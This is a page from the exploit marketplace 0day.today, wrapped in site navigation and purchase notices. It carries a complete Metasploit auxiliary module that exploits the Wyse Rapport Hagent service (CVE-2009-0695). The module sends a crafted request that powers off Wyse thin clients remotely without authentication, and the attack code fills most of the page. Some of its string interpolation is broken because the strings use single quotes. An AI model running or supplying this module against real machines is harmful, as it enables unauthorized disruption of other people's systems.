0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Wyse Machine Remote Power off (DOS) without any privilege
[
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'Wyse Machine Remote Power off (DOS)',
'Description' => %q{
This module exploits the Wyse Rapport Hagent service and cause
remote power cycle (Power off the wyse machine remotely).
},
'Stance' => Msf::Exploit::Stance::Aggressive,
'Author' => 'it.solunium@gmail.com',
'Version' => '$Revision: 14976 $',
'References' =>
[
['CVE', '2009-0695'],
['OSVDB', '55839'],
['US-CERT-VU', '654545'],
['URL', 'http://snosoft.blogspot.com/'],
['URL', 'http://www.theregister.co.uk/2009/07/10/wyse_remote_exploit_bugs/'],
['URL', 'http://www.wyse.com/serviceandsupport/support/WSB09-01.zip'],
['URL', 'http://www.wyse.com/serviceandsupport/Wyse%20Security%20Bulletin%20WSB09-01.pdf'],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Targets' =>
[
[ 'Wyse Linux x86', {'Platform' => 'linux',}],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jun 13 2012'
))
register_options(
[
Opt::RPORT(80),
], self.class)
end
def run
# Connect to the target service
print_status("Connecting to the target #{rhost}:#{rport}")
if connect
print_status("Connected...")
end
# Parameters
genmac = "00"+Rex::Text.rand_text(5).unpack("H*")[0]
craft_req = '&V52&CI=3|'
craft_req << 'MAC=#{genmac}|#{rhost}|'
craft_req << 'RB=0|MT=3|'
craft_req << '|HS=#{rhost}|PO=#{rport}|'
craft_req << 'SPO=0|'
# Send the malicious request
sock.put(craft_req)
# Download some response data
resp = sock.get_once(-1, 10)
print_status("Received: #{resp}")
disconnect
if not resp
print_error("No reply from the target, this may not be a vulnerable system")
return
end
if resp == '&00'
print_status("#{rhost} execute command succefuly & power off.")
return
end
#Exeptions
rescue ::Rex::ConnectionRefused
print_status("Couldn't connect to #{rhost}:#{rport} | Connection refused.")
rescue ::Rex::HostUnreachable
print_status("Couldn't connect to #{rhost}:#{rport} | Host unreachable")
rescue ::Rex::ConnectionTimeout
print_status("Couldn't connect to #{rhost}:#{rport} | Connection time out")
rescue ::Errno::ECONNRESET, ::Timeout::Error
print_status("#{rhost} not responding.")
end
end
# 0day.today [2024-11-16] #